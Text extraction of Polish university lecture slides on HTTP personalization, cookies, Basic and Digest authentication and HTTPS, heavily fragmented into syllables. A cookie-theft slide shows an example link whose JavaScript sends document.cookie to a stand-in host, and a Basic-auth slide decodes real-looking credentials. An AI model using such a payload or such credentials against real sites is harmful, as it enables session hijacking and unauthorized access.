technologie internetu – p. 1/37 personalizacja i uwierzytelnianie...
TRANSCRIPT
Te
ch
no
log
ieIn
tern
etu
Pers
on
ali
zacja
iu
wie
rzyte
lnia
nie
wH
TT
P
Ale
ksa
nd
er
De
nis
iuk
Po
lsko
-Ja
po
nska
Aka
de
mia
Te
ch
nik
Ko
mp
ute
row
ych
Wyd
zia
łIn
form
aty
kiw
Gd
an
sku
ul.
Brz
eg
i5
5
80
-04
5G
da
nsk
Technolo
gie
Inte
rnetu
–p.1/3
7
Pe
rso
na
liza
cja
iu
wie
rzy
teln
ian
ie
wH
TT
P
Na
jnow
sza
we
rsja
teg
od
oku
me
ntu
do
ste
pn
aje
st
po
da
dre
se
mhttp://users.pja.edu.pl/~denisjuk/
Technolo
gie
Inte
rnetu
–p.2/3
7
Pe
rso
na
liza
cja
tra
kto
wa
cza
da
nia
nie
an
on
imow
o
zin
dyw
idu
aliz
ow
an
ep
ow
ita
nia
ukie
run
kow
an
ere
kom
en
da
cje
prz
ech
ow
yw
an
ied
anych
uzytk
ow
nik
a
sle
dze
nie
se
sji
uzytk
ow
nik
a
Technolo
gie
Inte
rnetu
–p.3/3
7
Me
tod
yp
ers
on
ali
za
cji
wyko
rzysta
nie
na
głó
wkó
wH
TT
P
gru
be
ad
resy
UR
L(f
at
UR
Ls)
cia
ste
czka
(co
okie
s)
me
ch
an
izm
„lo
gow
an
ia”
uzytk
ow
nik
ów
po
łaczo
ny
zu
wie
rzyte
lnia
nie
m
Technolo
gie
Inte
rnetu
–p.4/3
7
Pe
rso
na
liza
cja
.N
ag
łów
ki
HT
TP
From
ad
res
e-m
ail
uzytk
ow
nik
a
User-Agent
ide
nty
fika
cja
klie
nta
HT
TP
Referer
ad
res
UR
Lstr
ony
zktó
reju
zytk
ow
nik
tra
fiłn
ab
ieza
cy
za
só
b
Client-IP
nu
me
rIP
kom
pu
tera
klie
nta
ogra
nic
zo
ne
mo
zliw
oscip
ers
on
aliz
acji;
zu
pe
łnie
nie
na
da
jesie
do
uw
ierz
yte
lnia
nia
Pa
no
pticlic
k
Technolo
gie
Inte
rnetu
–p.5/3
7
Me
tod
yp
ers
on
ali
za
cji
.G
rub
ea
dre
sy
prz
yp
oła
cze
niu
klie
nto
trzym
uje
un
ika
tow
yid
,któ
rysta
jesie
cze
scia
ad
resu
wyg
lad
(se
rwis
yskra
ca
jace
)
zaw
iera
da
ne
kon
kre
tnych
uzytk
ow
nik
ów
:p
roble
my
zbu
foro
wa
nie
miro
zp
ow
sze
ch
nie
nie
m
zw
iekszo
ne
ob
cia
ze
nie
se
rwe
ra
nie
trw
ało
sc
Technolo
gie
Inte
rnetu
–p.6/3
7
Me
tod
yp
ers
on
ali
za
cji
.C
iste
czk
a
(Co
ok
ies
)
Cia
ste
czka
nie
sa
cze
scia
de
fin
icji
pro
toko
łuH
TT
P/1
.1
Istn
ieja
dw
asta
nd
ard
ycia
ste
cze
k
ory
gin
aln
y,zd
efin
iow
any
prz
ez
firm
eN
ets
ca
pe
:“P
ers
iste
ntC
lien
tS
tate
:H
TT
PC
oo
kie
s”
(We
rsja
0,
Co
okie
sV
ers
ion
0)
RF
C2
10
9o
raz
RF
C2
96
5“H
TT
PS
tate
Ma
na
ge
me
ntM
ech
an
ism
”(W
ers
ja1
,C
oo
kie
sV
ers
ion
1)
Technolo
gie
Inte
rnetu
–p.7/3
7
Me
tod
yp
ers
on
ali
za
cji
.C
iste
czk
a
(Co
ok
ies
)
se
syjn
e
trw
ałe
de
mo
:
HEAD
/HTTP/1.1
Host:
www.allegro.pl
Technolo
gie
Inte
rnetu
–p.8/3
7
Nag
łów
ki
Co
ok
ies
Na
głó
wki:
Set-Cookie
(se
rwe
r)
Cookie
(klie
nt)
Technolo
gie
Inte
rnetu
–p.9/3
7
Set-Cookie
Set-Cookie:
name=v
[;expires=dt
][;
path=pt
][;
domain=dm
][;
secure
]
name
jestd
ow
oln
an
azw
acia
ste
czka
usta
lan
ap
rze
zse
rwe
r,v
okre
sla
jeg
ow
art
osc
name=v
jest
jed
ynym
wym
ag
anym
ele
me
nte
mcia
ste
czka
prz
ykła
d:Set-Cookie:
user=Olek
Technolo
gie
Inte
rnetu
–p.10/3
7
expires=dt
da
taw
azn
oscicia
ste
czka
form
atWeekday,
DD-Mon-YY
HH:MM:SS
GMT
prz
ykła
d:Wednesday,
24-Feb-09
12:25:00
GMT
gd
yu
pły
nie
„da
taw
azn
osci”
cia
ste
czka
,n
ieb
ed
zie
juz
on
oa
nip
rze
ch
ow
yw
an
ed
łuze
jp
rze
zklie
nta
,a
ni
prz
esyła
ne
jesli
se
rwe
rn
iep
rze
sła
ła
trybu
tuexpires
,to
ozn
acza
to,
ze
cia
ste
czko
jest
typ
use
syjn
eg
o
Technolo
gie
Inte
rnetu
–p.11/3
7
path=pt
wa
rto
scpt
atr
ybu
tupath
po
zw
ala
okre
slic
pre
fiks
scie
zkid
oza
so
bó
wd
októ
rych
cia
ste
czko
ma
sie
od
no
sic
prz
ykła
d:
path=/im
/im
ozn
acza
,ze
cia
ste
czko
od
no
sisie
np.d
o/images
jak
id
o/im/capture.png
/o
zn
acza
,ze
cia
ste
czko
od
no
sisie
do
wszystk
ich
za
so
bó
wn
ase
rwe
rze
Technolo
gie
Inte
rnetu
–p.12/3
7
domain=dm
wa
rto
scdm
atr
ybu
tudomain
okre
sla
do
me
ne,któ
rej
do
tyczy
cia
ste
czko
wa
rto
sc
cia
ste
czka
mo
zn
aw
ysyła
cw
yła
czn
ied
om
aszyn
do
nie
jn
ale
za
cych
prz
ykła
d:
domain=xyz.edu.pl
wyła
czn
iese
rwe
rzn
ajd
uja
cy
sie
wd
an
ejd
om
en
iem
oze
wysyła
ccia
ste
czko
za
trybu
tem
od
wo
łuja
cym
sie
do
nie
j
jesli
se
rwe
rn
iep
rze
sła
łw
art
oscia
trybu
tudomain
,klie
nt
prz
yjm
uje
,ze
jest
on
aró
wn
an
azw
iese
rwe
ra
Technolo
gie
Inte
rnetu
–p.13/3
7
secure
atr
ybu
tsecure
ozn
acza
,ze
cia
ste
czko
mo
zn
ap
rze
syła
cje
dyn
iep
rze
zb
ezp
ieczn
ep
oła
cze
nie
HT
TP
S
Technolo
gie
Inte
rnetu
–p.14/3
7
Cookie
Na
głó
we
kza
da
niaCookie
słu
zy
do
prz
esyła
nia
do
se
rwe
raw
szystk
ich
nie
prz
ete
rmin
ow
anych
cia
ste
cze
k,
któ
rep
asu
jad
ofiltra
:u
zyw
an
ejscie
zkid
oza
so
bu
,n
azw
yse
rwe
ra,o
raz
sto
sow
an
ejm
eto
dy
prz
esyła
nia
(HT
TP
/HT
TP
S)
Wa
rto
sc
na
głó
wkaCookie
sta
now
i(r
ozd
zie
lon
asre
dn
ika
mi)
lista
wszystk
ich
cia
ste
cze
ksp
ełn
iaja
cych
pow
yzsze
wym
ag
an
iaizn
ajd
uja
cych
sie
wsta
nie
po
sia
da
nia
klie
nta
Cookie:
user=Olek;
last-visit=20130523
Technolo
gie
Inte
rnetu
–p.15/3
7
Co
ok
ies
Ve
rsio
n1
ka
zd
ecia
ste
czko
mo
ze
po
sia
da
co
pis
fun
kcjo
na
lno
sci
mo
zliw
osc
usu
nie
cia
dow
oln
eg
ocia
ste
czka
prz
yza
myka
niu
ap
lika
cji
klie
nta
(na
głó
we
kDiscard
)
term
inw
azn
osciw
yra
za
ny
rela
tyw
nie
(wse
ku
nd
ach
)—
now
yn
ag
łów
ekMax-Age
zd
oln
osc
do
filtro
wa
nia
cia
ste
cze
kró
wn
iez
po
prz
ez
nu
me
rp
ort
uIP
se
rwe
ra
do
da
tkow
en
ag
łów
kiSet-Cookie2
iCookie2
na
głó
we
kCookie2
prz
esyła
info
rma
cje
ofiltrz
e,
któ
ryzo
sta
łza
sto
sow
any
do
cia
ste
cze
k
Technolo
gie
Inte
rnetu
–p.16/3
7
Cia
ste
czk
a.U
wag
i
pro
ble
my
pra
wn
e
po
dkra
da
nie
cia
ste
cze
k
<ahref="#"
onclick="
window.location=
'http://xxx.com/?cs=
'+escape(document.cookie);
return
false;"
>Kliknij
mnie!</a>
Technolo
gie
Inte
rnetu
–p.17/3
7
Uw
ierz
yte
lnia
nie
Zw
ery
fiko
wa
nie
za
de
kla
row
an
ejto
zsa
mo
scio
so
by
Je
dn
az
na
jpro
sts
zych
me
tod
uw
ierz
yte
lnia
nia
jest
me
ch
an
izm
log
ow
an
iaz
wyko
rzysta
nie
mh
asła
Dw
ieo
ficja
lne
me
tod
yu
wie
rzyte
lnia
nia
HT
TP
(RF
C1
94
5,R
FC
26
16
,R
FC
26
17
):
me
tod
ap
od
sta
wow
a/B
asic
(an
g.
Ba
sic
Au
the
ntica
tio
n)
me
tod
askró
tu/D
ige
st
(an
g.
Dig
est
Au
the
ntica
tio
n)
Za
kła
da
my,
ze
se
rwe
rp
osia
da
(iw
be
zp
ieczny
sp
osó
bp
rze
ch
ow
uje
)d
an
eu
wie
rzyte
lnia
jace
uzytk
ow
nik
ów
Technolo
gie
Inte
rnetu
–p.18/3
7
Uw
ierz
yte
lnia
nie
.Z
as
tos
ow
an
ie
Se
rwe
rysie
cio
we
win
tern
ecie
Se
rwe
rysie
cio
we
win
tra
ne
cie
Se
rwe
ryp
roxy
win
tern
ecie
Se
rwe
ryp
roxy
win
tra
ne
cie
Technolo
gie
Inte
rnetu
–p.19/3
7
Uw
ierz
yte
lnia
nie
Ba
sic
Liv
eh
ttp
he
ard
ers
https://inf.ug.edu.pl/~wpawlowski/lab/TSW/
Host:
inf.ug.edu.pl
User-Agent:
Mozilla/5.0
(X11;Linux
x86_64;
rv:60.0)
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,
Accept-Language:
pl,en-US;q=0.7,en;q=0.3
Accept-Encoding:
gzip,
deflate,
br
Cookie:
PHPSESSID=u06gmdqlog4qifgjnl1d3kb4k6
Connection:
keep-alive
Upgrade-Insecure-Requests:
1
Technolo
gie
Inte
rnetu
–p.20/3
7
Uw
ierz
yte
lnia
nie
Ba
sic
.O
dp
ow
ied
z
se
rwe
ra
HTTP/1.1
401Unauthorized
Date:
Mon,21
Jan2019
09:53:45
GMT
Server:
Apache/2.4.18
(Ubuntu)
Phusion_Passenger/5.0.27
WWW-Authenticate:
Basic
realm="Technologie
sieci
Content-Length:
381
Keep-Alive:
timeout=5,
max=99
Connection:
Keep-Alive
Content-Type:
text/html;
charset=iso-8859-1
Technolo
gie
Inte
rnetu
–p.21/3
7
Uw
ierz
yte
lnia
nie
Ba
sic
.O
kn
o
prz
eg
lad
ark
i
Technolo
gie
Inte
rnetu
–p.22/3
7
Uw
ierz
yte
lnia
nie
Ba
sic
.W
ys
yła
nie
ha
sła
GET/~wiesiek/pjwstk/TIN/
HTTP/1.1
Host:
www.ipipan.gda.pl
User-Agent:
Mozilla/5.0
(X11;U;
Linuxi686;
en-US;
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,
Accept-Language:
pl,ru;q=0.8,en-us;q=0.6,en;q=0.4,be;q=0.2
Accept-Encoding:
gzip,deflate
Accept-Charset:
ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive:
300
Connection:
keep-alive
Authorization:
BasicdGluOlN0dWRuZXQgMTQ4
olek@mingus:~$
base64
-d
dGluOlN0dWRuZXQgMTQ4
tin:Studnet
148
olek@mingus:~$
Technolo
gie
Inte
rnetu
–p.23/3
7
Uw
ierz
yte
lnia
nie
po
pra
wn
e.
Od
po
wie
dz
se
rwe
ra
HTTP/1.1
200OK
Date:
Fri,06
May2011
15:50:32
GMT
Server:
Apache/2.2.3
(CentOS)
OpenSSL/0.9.8o
Content-Length:
959
Keep-Alive:
timeout=15,
max=100
Connection:
Keep-Alive
Content-Type:
text/html;charset=UTF-8
Technolo
gie
Inte
rnetu
–p.24/3
7
Uw
ierz
yte
lnia
nie
ba
sic
.K
ole
jne
za
pta
nia
GET/~wiesiek/pjwstk/TIN/TestEgzaminacyjny.txt
HTTP/1.1
Host:
www.ipipan.gda.pl
User-Agent:
Mozilla/5.0
(X11;U;
Linuxi686;
en-US;
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,
Accept-Language:
pl,ru;q=0.8,en-us;q=0.6,en;q=0.4,be;q=0.2
Accept-Encoding:
gzip,deflate
Accept-Charset:
ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive:
300
Connection:
keep-alive
Authorization:
BasicdGluOlN0dWRuZXQgMTQ4
Technolo
gie
Inte
rnetu
–p.25/3
7
Uw
ierz
yte
lnia
nie
ba
sic
.U
wag
i
Me
tod
aje
st
wsp
iera
na
prz
ez
wszystk
iep
rze
gla
da
rki
Ła
twa
do
testo
wa
nia
(zw
ykły
tekst)
Na
zw
au
zytk
ow
nik
aih
asło
prz
esyła
ne
sa
„otw
art
ym
tekste
m”
Je
st
po
da
tna
na
wykra
da
nie
ha
sła
prz
ez
„fa
łszyw
ese
rwe
ry”
(sp
oo
fin
g)
—n
ieo
feru
jeza
dnych
me
ch
an
izm
ów
we
ryfika
cji
se
rwe
ra
Mo
zn
ab
ezp
ieczn
iesto
sow
ac
wp
oła
cze
niu
zszyfr
ow
an
iem
(SS
L/T
LS
)
Prz
eg
lad
ark
itr
zym
aja
log
in/h
asło
wp
am
ieci,
bra
km
ech
an
izm
u„w
ylo
gow
an
ia”
uzytk
ow
nik
a
Technolo
gie
Inte
rnetu
–p.26/3
7
Uw
ierz
yte
lnia
nie
Dig
es
t.Z
ad
an
ie
GET/dir/index.html
HTTP/1.1
Host:
www.nowhere.org
Technolo
gie
Inte
rnetu
–p.27/3
7
Uw
ierz
yte
lnia
nie
Dig
es
t.O
dp
ow
ied
z
HTTP/1.1
401Unauthorized
WWW-Authenticate:
Digest
realm="[email protected]",
qop="auth,auth-int",
nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",
opaque="5ccc069c403ebaf9f0171e9517f40e41"
Technolo
gie
Inte
rnetu
–p.28/3
7
Dig
es
t.W
ys
yła
nie
da
ny
ch
uw
ierz
yte
lnia
jacy
ch
GET/dir/index.html
HTTP/1.0
Host:
localhost
Authorization:
Digest
username="Mufasa",
realm="[email protected]",
nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",
uri="/dir/index.html",
qop=auth,
nc=00000001,
cnonce="0a4f113b",
response="6629fae49393a05397450978507c4ef1",
opaque="5ccc069c403ebaf9f0171e9517f40e41"
Technolo
gie
Inte
rnetu
–p.29/3
7
Dig
es
t.W
ys
yła
nie
da
ny
ch
prz
ez
se
rwe
r
HTTP/1.0
200OK
Server:
HTTPd/0.9
Date:
Sun,10
Apr2005
20:27:03
GMT
Content-Type:
text/html
Content-Length:
7984
Authentication-Info:
nextnonce="47364c23432d2e131a5fb210812c",
rspauth="641b92d2d8af170329ce308832a4df13"
cnonce="0a4f113b",
nc=00000001,
qop=auth
Technolo
gie
Inte
rnetu
–p.30/3
7
Dig
es
t.O
bli
cze
nia
qo
p=
qu
alit
yo
fp
rote
ctio
n
auth
,auth-int
alg
ori
thm
MD5
,MD5-sess
no
nce
=n
um
be
ru
se
do
nce
cn
on
ce
=clie
nt-
ge
ne
rate
dn
um
be
ru
se
do
nce
Technolo
gie
Inte
rnetu
–p.31/3
7
Dig
es
t.O
bli
cze
nieresponse
A1=
user:realm
:pass
dlaMD5
MD5(user:realm
:pass):non
ce:cn
once
dlaMD5-sess
A2=
Method:uri
dlaauth
Method:uri:M
D5(entity)
dlaauth-int
respon
se=
MD5(
MD5(A1)
:non
ce:MD5(A2))
,je
ze
liqop
nie
okre
slo
ny
MD5(
MD5(A1)
:non
ce:nc:cn
once
:qop
:MD5(A2)) Technolo
gie
Inte
rnetu
–p.32/3
7
Uw
ierz
yte
lnia
nie
dig
es
t.U
wag
i
Prz
eka
zyw
any
jest
skró
th
asła
.P
od
atn
osc
na
sła
be
ha
sła
—ja
kka
zd
am
eto
da
op
art
ao
ha
sła
.
Na
se
rwe
rze
mo
zn
ap
rzch
ow
yw
ac
tylk
oMD5(usernam
e:realm
:passw
ord)
cnonce
do
da
jeo
dp
orn
osc
na
ch
ose
np
lain
text
ata
k.
nonce
mo
ze
zaw
iera
ctim
esta
mp
,m
oze
mie
clis
tew
yg
en
ero
wa
nchnonce
.O
dp
orn
osc
na
ata
kp
ow
tarz
an
iem
.
Wie
leo
pcji
wR
FC
26
17
jest
nie
ob
ow
iazko
wych
.W
szcze
gó
lno
sci,qop
mo
ze
nie
byc
okre
slo
nym
.
nie
wszystk
iese
rwe
ry/p
rze
gla
da
rkio
bsłu
gu
jaauth-int
.Technolo
gie
Inte
rnetu
–p.33/3
7
Uw
ierz
yte
lnia
nie
dig
es
t
Po
da
tno
sc
na
ata
km
an
-in
-th
e-m
idd
le.
Technolo
gie
Inte
rnetu
–p.34/3
7
Pro
tok
ół.
HT
TP
S
Za
nu
rze
nie
HT
TP
wS
SL
/TS
L
TC
P
TS
L
Po
rt8
0
po
rt4
43
Wszystk
ieza
da
nia
io
dp
ow
ied
ziH
TT
Psa
szyfr
ow
an
eza
nim
zo
sta
na
wysła
ne
do
sie
ci
Uw
ierz
yte
lnie
nie
sym
etr
yczn
e(w
pra
kty
ce
rza
dko
sto
sow
an
e)
Szyfr
on
an
iesym
etr
yczn
eia
sym
etr
yczn
e
Technolo
gie
Inte
rnetu
–p.35/3
7
SS
LH
ea
nd
sh
ak
e
RN
cPMS
MS
MS
RN
c
RN
s
RN
s
RN
s
public key client
private key client
public key server
private key server
Client
Server
Ph
ase
1
Ph
ase
4
Ph
ase
3
Ph
ase
2
RN
c
RN
c
RN
c
RN
c
RN
c
generate random number
client_hello (crypto inform
ation,
RN
cgenerate random number
server_hello (crypto inform
ation,
)
server certificate (incl.
demand client certificate
check server certificate
client certificate (incl.
check client certificate
hash over all previous messages (signed with
check hash and signature
PMS
generate random number pre-m
aster-secret
encrypted with
calculate Master-Secret from
RN
cPMS
end SSL handshake
end SSL handshake
change to encrypted connection with
as key
)
)
)
)
change to encrypted connection with
as key
Technolo
gie
Inte
rnetu
–p.36/3
7
Ce
rty
fik
aty
Va
lida
cja
(op
cjo
na
lna
)
da
ty
czy
ce
rtyfika
tzo
sta
łp
od
pis
any
prz
ez
„go
dny
za
ufa
nia
”o
rga
nce
rtyfika
cji
(ce
rtifi
ca
tea
uth
ori
ty—
CA
)
pra
wd
ziw
osc
po
dp
isu
osro
dka
ce
rtyfika
cji
czy
zaw
art
aw
ce
rtyfika
cie
na
zw
ad
om
eny
od
pow
iad
an
azw
ied
om
eny
se
rwe
ra
Prz
ykła
dy:
https://www.scpe.org/index.php/scpe/login
https://ssl.allegro.pl/enter_login.php
Technolo
gie
Inte
rnetu
–p.37/3
7